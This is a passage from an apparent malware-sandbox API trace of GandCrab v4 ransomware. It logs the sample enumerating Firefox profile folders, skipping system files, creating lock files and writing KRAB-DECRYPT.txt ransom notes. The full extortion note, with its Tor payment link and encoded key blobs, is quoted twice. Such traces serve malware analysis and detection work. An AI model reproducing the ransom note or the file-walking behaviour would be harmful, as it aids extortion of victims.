(lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.713] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.713] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.713] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0080.713] FindClose (in: hFindFile=0x1023df8 | out: hFindFile=0x1023df8) returned 1 [0080.713] CloseHandle (hObject=0x720) returned 1 [0080.714] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0080.714] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0080.714] CloseHandle (hObject=0x7ec) returned 1 [0080.714] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0080.714] lstrcmpW (lpString1="gmp-gmpopenh264", lpString2=".") returned 1 [0080.714] lstrcmpW (lpString1="gmp-gmpopenh264", lpString2="..") returned 1 [0080.714] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="gmp-gmpopenh264" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264" [0080.714] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\" [0080.714] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0080.714] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.715] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.715] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.715] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.715] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\\\KRAB-DECRYPT.txt") returned 113 [0080.715] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0080.716] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0080.716] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0080.717] CloseHandle (hObject=0x7ec) returned 1 [0080.717] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.717] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.718] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1b, wMilliseconds=0x395)) [0080.718] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.718] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.718] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.718] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock") returned 119 [0080.718] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0080.735] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.735] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\") returned 96 [0080.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*" [0080.736] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1023cb8 [0080.736] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.736] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.736] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.736] lstrcmpW (lpString1="1.6", lpString2=".") returned 1 [0080.736] lstrcmpW (lpString1="1.6", lpString2="..") returned 1 [0080.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="1.6" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6" [0080.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\" [0080.736] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0080.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.737] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.737] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.737] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\\\KRAB-DECRYPT.txt") returned 117 [0080.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0080.738] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0080.738] WriteFile (in: hFile=0x720, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0080.739] CloseHandle (hObject=0x720) returned 1 [0080.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.740] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.740] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1b, wMilliseconds=0x3a5)) [0080.740] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0080.740] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.740] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.741] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock") returned 123 [0080.741] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x720 [0080.745] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.745] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.745] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\") returned 100 [0080.745] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*" [0080.745] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023df8 [0080.745] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.746] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.746] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.746] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.746] FindNextFileW (in: hFindFile=0x1023df8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.746] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.746] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 